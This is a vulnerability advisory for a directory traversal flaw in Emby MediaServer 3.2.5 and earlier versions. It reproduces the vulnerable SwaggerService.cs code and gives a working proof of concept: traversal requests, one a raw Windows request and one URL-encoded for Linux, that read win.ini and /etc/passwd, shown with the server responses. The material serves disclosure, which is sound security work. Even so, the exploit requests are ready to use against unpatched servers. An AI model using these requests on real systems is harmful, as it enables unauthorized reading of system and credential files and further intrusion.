Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability

### Summary Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model. Two comparable media servers are Plex and Windows Media Center. ### Description The vulnerability was confirmed on tested platforms depending on the version. Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not properly verified before being used to load resources. This can be exploited to disclose the contents of arbitrary files via directory traversal attacks. ### Vendor Emby LLC - https://www.emby.media ### Affected Version * 3.2.5 * 3.1.5 * 3.1.2 * 3.1.1 * 3.1.0 * 3.0.0 ### Tested On * Microsoft Windows 7 Professional SP1 (EN) * Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 * Ubuntu Linux 14.04.5 * MacOS Sierra 10.12.3 * SQLite3 ### detail `/Emby.Server.Implementations/HttpServer/SwaggerService.cs`: ``` using MediaBrowser.Controller; using MediaBrowser.Controller.Net; using System.IO; using MediaBrowser.Model.IO; using MediaBrowser.Model.Services; namespace Emby.Server.Implementations.HttpServer { public class SwaggerService : IService, IRequiresRequest { private readonly IServerApplicationPaths _appPaths; private readonly IFileSystem _fileSystem; public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory) { _appPaths = appPaths; _fileSystem = fileSystem; _resultFactory = resultFactory; } /// <summary> /// Gets the specified request. /// </summary> /// <param name="request">The request.</param> /// <returns>System.Object.</returns> public object Get(GetSwaggerResource request) { var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui"); var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar)); return _resultFactory.GetStaticFileResult(Request, requestedFile).Result; } /// <summary> /// Gets or sets the result factory. /// </summary> /// <value>The result factory.</value> private readonly IHttpResultFactory _resultFactory; /// <summary> /// Gets or sets the request context. /// </summary> /// <value>The request context.</value> public IRequest Request { get; set; } } } ``` ### PoC ``` GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 ``` ``` HTTP/1.1 200 OK X-UA-Compatible: IE=Edge Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS Access-Control-Allow-Origin: * Vary: Accept-Encoding ETag: "07bec80f76d20d26dd300a855219d321" Cache-Control: public Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 Content-Type: application/octet-stream Date: Thu, 22 Dec 2016 10:43:53 GMT Content-Length: 403 Connection: close ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo ``` On Linux: ``` http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd ``` ``` root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ... ... ```